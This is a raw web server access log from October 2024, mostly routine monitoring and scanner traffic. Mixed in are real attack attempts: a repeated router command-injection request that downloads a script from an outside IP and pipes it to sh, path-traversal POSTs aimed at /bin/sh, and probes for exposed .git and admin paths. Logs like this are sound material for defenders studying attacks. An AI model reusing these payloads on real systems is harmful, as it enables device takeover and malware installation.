212.91.246.72 - - [01/Oct/2024:10:44:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:10:45:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:10:46:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:10:47:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:10:48:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:10:49:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [01/Oct/2024:10:50:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Oct/2024:10:50:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:10:51:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.67 - - [01/Oct/2024:10:52:20 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.19.99%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [01/Oct/2024:10:52:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:10:53:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.67 - - [01/Oct/2024:10:54:20 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.19.99%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [01/Oct/2024:10:54:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:10:55:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:10:56:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.67 - - [01/Oct/2024:10:57:35 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.19.99%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [01/Oct/2024:10:57:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:10:58:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [01/Oct/2024:10:59:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Oct/2024:10:59:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:11:00:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [01/Oct/2024:11:01:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Oct/2024:11:01:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [01/Oct/2024:11:01:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
154.213.184.15 - - [01/Oct/2024:11:02:40 +0200] "POST /cgi-bin/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/bin/sh HTTP/1.1" 400 333 "-" "-"
64.62.197.98 - - [01/Oct/2024:11:02:48 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [01/Oct/2024:11:02:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
74.82.47.2 - - [01/Oct/2024:11:03:05 +0200] "\x16\x03\x01" 501 318 "-" "-"
216.218.206.67 - - [01/Oct/2024:11:03:13 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [01/Oct/2024:11:03:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:11:04:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:11:05:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:11:06:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.67 - - [01/Oct/2024:11:06:52 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.19.99%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [01/Oct/2024:11:07:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:11:08:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.67 - - [01/Oct/2024:11:09:29 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.19.99%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [01/Oct/2024:11:09:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:11:10:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:11:11:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:11:12:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:11:13:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:11:14:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:11:15:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.216.149.241 - - [01/Oct/2024:11:16:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [01/Oct/2024:11:16:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:11:17:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.67 - - [01/Oct/2024:11:18:18 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.19.99%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [01/Oct/2024:11:18:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:11:19:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:11:20:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:11:21:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:11:22:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:11:23:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.67 - - [01/Oct/2024:11:23:51 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.19.99%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [01/Oct/2024:11:24:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:11:25:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:11:26:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:11:27:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:11:28:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.98.11.79 - - [01/Oct/2024:11:29:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
212.91.246.72 - - [01/Oct/2024:11:29:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.180.140.106 - - [01/Oct/2024:11:30:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [01/Oct/2024:11:30:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:11:31:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:11:32:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:11:33:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [01/Oct/2024:11:33:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Oct/2024:11:34:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:11:35:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [01/Oct/2024:11:35:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
147.185.132.24 - - [01/Oct/2024:11:36:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [01/Oct/2024:11:36:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.67 - - [01/Oct/2024:11:37:41 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.19.99%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [01/Oct/2024:11:37:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:11:38:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:11:39:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:11:40:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:11:41:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.235.24.143 - - [01/Oct/2024:11:41:50 +0200] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.143 - - [01/Oct/2024:11:41:50 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [01/Oct/2024:11:42:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:11:43:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.67 - - [01/Oct/2024:11:44:03 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.19.99%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [01/Oct/2024:11:44:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [01/Oct/2024:11:45:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Oct/2024:11:45:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:11:46:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:11:47:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:11:48:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:11:49:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.106.199.212 - - [01/Oct/2024:11:50:11 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Custom-AsyncHttpClient"
212.91.246.72 - - [01/Oct/2024:11:50:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:11:51:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
91.92.247.105 - - [01/Oct/2024:11:52:39 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
91.92.247.105 - - [01/Oct/2024:11:52:42 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
212.91.246.72 - - [01/Oct/2024:11:52:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.98.11.79 - - [01/Oct/2024:11:53:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
212.91.246.72 - - [01/Oct/2024:11:53:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:11:54:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:11:55:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
8.220.210.24 - - [01/Oct/2024:11:56:36 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Custom-AsyncHttpClient"
212.91.246.72 - - [01/Oct/2024:11:56:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:11:57:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:11:58:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:11:59:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:12:00:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.98.11.79 - - [01/Oct/2024:12:00:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
212.91.246.72 - - [01/Oct/2024:12:01:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
199.45.154.146 - - [01/Oct/2024:12:02:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Oct/2024:12:02:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
199.45.154.146 - - [01/Oct/2024:12:02:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
199.45.154.146 - - [01/Oct/2024:12:02:54 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
199.45.154.146 - - [01/Oct/2024:12:02:55 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
212.91.246.72 - - [01/Oct/2024:12:03:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:12:04:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.67 - - [01/Oct/2024:12:05:34 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.19.99%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [01/Oct/2024:12:05:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:12:06:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:12:07:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:12:08:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:12:09:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:12:10:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
172.104.137.47 - - [01/Oct/2024:12:11:21 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
172.104.137.47 - - [01/Oct/2024:12:11:21 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
172.104.137.47 - - [01/Oct/2024:12:11:21 +0200] "GET /QzJG HTTP/1.1" 404 309 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:21 +0200] "GET /.git/HEAD HTTP/1.1" 404 314 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:21 +0200] "GET /rest/applinks/1.0/manifest HTTP/1.1" 404 331 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:21 +0200] "GET /nmaplowercheck1727776734 HTTP/1.1" 404 329 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:21 +0200] "GET /Portal/Portal.mwsl HTTP/1.1" 404 323 "-" "curl/7.54.0"
172-104-137-47.ip.linodeusercontent.com - - [01/Oct/2024:12:11:21 +0200] "GET /server-status HTTP/1.1" 403 322 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:21 +0200] "GET /webui HTTP/1.1" 404 310 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:21 +0200] "GET /CSS/Miniweb.css HTTP/1.1" 404 320 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:21 +0200] "GET /webui HTTP/1.1" 404 310 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:21 +0200] "GET /Portal0000.htm HTTP/1.1" 404 319 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:21 +0200] "GET /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 HTTP/1.1" 200 1229 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:21 +0200] "GET /confluence/rest/applinks/1.0/manifest HTTP/1.1" 404 342 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:21 +0200] "GET /pools/default/buckets HTTP/1.1" 404 326 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:21 +0200] "GET /docs/cplugError.html/ HTTP/1.1" 404 326 "-" "curl/7.54.0"
185.224.128.67 - - [01/Oct/2024:12:11:21 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.19.99%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
172.104.137.47 - - [01/Oct/2024:12:11:27 +0200] "POST /scripts/WPnBr.dll HTTP/1.1" 404 322 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:27 +0200] "GET /HNAP1 HTTP/1.1" 404 310 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:27 +0200] "GET /user HTTP/1.1" 404 309 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:27 +0200] "GET /__Additional HTTP/1.1" 404 317 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:27 +0200] "GET /main.html HTTP/1.1" 404 314 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:27 +0200] "GET /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 HTTP/1.1" 200 1229 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:27 +0200] "POST /sdk HTTP/1.1" 404 308 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:27 +0200] "\x16\x03\x01\x02" 501 319 "-" "-"
172.104.137.47 - - [01/Oct/2024:12:11:27 +0200] "GET /pools HTTP/1.1" 404 310 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:27 +0200] "GET /owa/ HTTP/1.1" 404 309 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:27 +0200] "GET /user HTTP/1.1" 404 309 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:27 +0200] "GET /localstart.asp HTTP/1.1" 404 319 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:28 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:28 +0200] "GET /owa/ HTTP/1.1" 404 309 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:28 +0200] "GET /human.aspx HTTP/1.1" 404 315 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:28 +0200] "HEAD / HTTP/1.1" 200 - "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:28 +0200] "GET /home.cgi HTTP/1.1" 404 313 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:28 +0200] "GET /human.aspx HTTP/1.1" 404 315 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:28 +0200] "GET /inicio.jsa HTTP/1.1" 404 315 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:28 +0200] "GET /dana-cached/hc/HostCheckerInstaller.osx HTTP/1.1" 404 344 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:28 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:28 +0200] "GET /dana-na/nc/nc_gina_ver.txt HTTP/1.1" 404 331 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:28 +0200] "GET /home.pl HTTP/1.1" 404 312 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:28 +0200] "GET /+CSCOE+/logon.html HTTP/1.1" 404 323 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:28 +0200] "GET /menu.aspx HTTP/1.1" 404 314 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:28 +0200] "GET /CFIDE/componentutils/ HTTP/1.1" 404 326 "-" "curl/7.54.0"
172.104.137.47 - - [01/Oct/2024:12:11:28 +0200] "GET /readme.txt HTTP/1.1" 404 315 "-" "curl/7.54.0"
